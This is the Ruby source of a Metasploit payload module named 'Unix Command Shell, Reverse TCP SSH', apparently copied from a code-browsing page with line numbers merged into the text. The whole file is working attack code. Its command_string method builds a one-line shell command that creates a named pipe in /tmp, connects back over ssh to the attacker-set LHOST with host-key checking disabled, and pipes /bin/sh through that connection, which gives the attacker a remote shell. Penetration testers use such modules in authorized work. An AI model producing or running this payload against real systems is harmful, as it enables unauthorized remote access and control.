Path: blob/master/modules/payloads/singles/cmd/unix/reverse_ssh.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'msf/core/handler/reverse_ssh'67module MetasploitModule8CachedSize = :dynamic910include Msf::Payload::Single11include Msf::Sessions::CommandShellOptions1213def initialize(info = {})14super(15merge_info(16info,17'Name' => 'Unix Command Shell, Reverse TCP SSH',18'Description' => 'Connect back and create a command shell via SSH',19'Author' => [20'RageLtMan <rageltman[at]sempervictus>', # Rex/Metasploit21'hirura' # HrrRbSsh22],23'License' => MSF_LICENSE,24'Platform' => 'unix',25'Arch' => ARCH_CMD,26'Handler' => Msf::Handler::ReverseSsh,27'Session' => Msf::Sessions::SshCommandShellReverse,28'PayloadType' => 'cmd',29'RequiredCmd' => 'ssh',30'Payload' => { 'Offsets' => {}, 'Payload' => '' }31)32)33register_advanced_options(34[35Msf::OptString.new('SshClientOptions', [36false,37'Space separated options for the ssh client',38'UserKnownHostsFile=/dev/null StrictHostKeyChecking=no'39]),40OptString.new('SSHPath', [true, 'The path to the SSH executable', 'ssh']),41OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])42]43)44end4546#47# Constructs the payload48#49def generate(_opts = {})50return super + command_string51end5253#54# Returns the command string to use for execution55#56def command_string57backpipe = Rex::Text.rand_text_alpha_lower(4..8)58lport = datastore['LPORT'] == 22 ? '' : "-p #{datastore['LPORT']} "59opts = datastore['SshClientOptions'].blank? ? '' : datastore['SshClientOptions'].split(' ').compact.map { |e| "-o #{e} " }.join60"mkfifo /tmp/#{backpipe};#{datastore['SSHPath']} -qq #{opts}#{datastore['LHOST']} #{lport}0</tmp/#{backpipe}|#{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1;rm /tmp/#{backpipe}"61end62end636465